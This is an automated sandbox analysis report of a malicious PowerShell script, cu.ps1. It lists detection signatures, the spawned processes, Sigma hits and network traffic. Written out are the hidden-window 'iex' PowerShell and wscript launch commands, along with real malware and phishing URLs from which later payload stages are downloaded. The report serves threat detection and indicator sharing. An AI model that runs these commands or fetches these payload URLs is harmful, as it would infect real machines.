
Windows Analysis Report
cu.ps1

Overview

General Information

Sample name: cu.ps1
Analysis ID: 1568998
MD5: ffe670c96b95f411565aad0ed1bd8826
SHA1: 2069824f37cedac9e4ac4fdd68cbdf9903469d25
SHA256: 981751d5f3e0745c63ebbb34a2007ad61bc16c407f57173cb5f315e9ec9e5972
Tags: Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 7956 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell command line removed]" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8124 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7372 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 8008 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7372.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_8008.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

          System Summary

          Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", ProcessId: 7584, ProcessName: powershell.exe
          Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7372, TargetFilename: C:\Users\Public\tq5.vbs
          Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ProcessId: 7372, ProcessName: powershell.exe
          Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7372, TargetFilename: C:\Users\Public\tq5.vbs
          Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell command line removed]"
          Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ProcessId: 7372, ProcessName: powershell.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-05T10:39:40.070592+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49712 | 184.171.244.231 | 443 | TCP


          AV Detection

          Source: cu.ps1 | Avira: detected
          Source: https://www.erp-royal-crown.info/wh/Subordineren | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerend | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerende | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordine | Avira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbs | Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/ | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smip | Avira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Subord | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/w | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
          Source: https://www.almrwad.com/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinere | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subor | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordi | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subo | Avira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.info | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.s | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordin | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78 | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Su0 | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7 | Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/ | Avira URL Cloud: Label: phishing
          Source: cu.ps1 | ReversingLabs: Detection: 31%
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
          Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.9:49709 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.9:49711 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.9:49713 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb_ source: powershell.exe, 00000003.00000002.1554617977.000002A67CA47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553526249.000002A67C920000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb]Y source: powershell.exe, 00000003.00000002.1552369513.000002A67C75B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kore.pdb5 source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Htem.pdb% source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb 024 source: powershell.exe, 00000000.00000002.1735847498.0000022A2ACA6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb'N source: powershell.exe, 00000003.00000002.1554888189.000002A67CA85000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdb! source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb- source: powershell.exe, 00000007.00000002.2752630395.0000022536E27000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000007.00000002.2755751802.0000022537072000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbon.resourcesy source: powershell.exe, 00000000.00000002.1735847498.0000022A2AC61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370AB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdb source: powershell.exe, 00000003.00000002.1554151718.000002A67C9DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2755751802.00000225370C4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global traffic | HTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1; Host: www.fornid.com; Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /na/mg.vbs HTTP/1.1; Host: www.pineappletech.ae; Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1; Host: www.almrwad.com
          Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1; Host: www.erp-royal-crown.info; Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1; Host: www.almrwad.com; Connection: Keep-Alive
          Source: Joe Sandbox View | IP Address: 148.251.114.233
          Source: Joe Sandbox View | ASN Name: SERVERPLAN-ASIT
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49712 -> 184.171.244.231:443
          Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global traffic | DNS traffic detected: DNS query: www.fornid.com
          Source: global traffic | DNS traffic detected: DNS query: www.pineappletech.ae
          Source: global traffic | DNS traffic detected: DNS query: www.almrwad.com
          Source: global traffic | DNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:26 GMT | Server: Apache | P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" | Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:34 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:39 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:45 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:51 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:57 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:03 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:09 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:15 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:21 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:26 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:32 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:38 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:44 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:50 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:56 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:41:02 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:41:07 GMT | server: LiteSpeed
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
          Source: powershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.almrwad.com
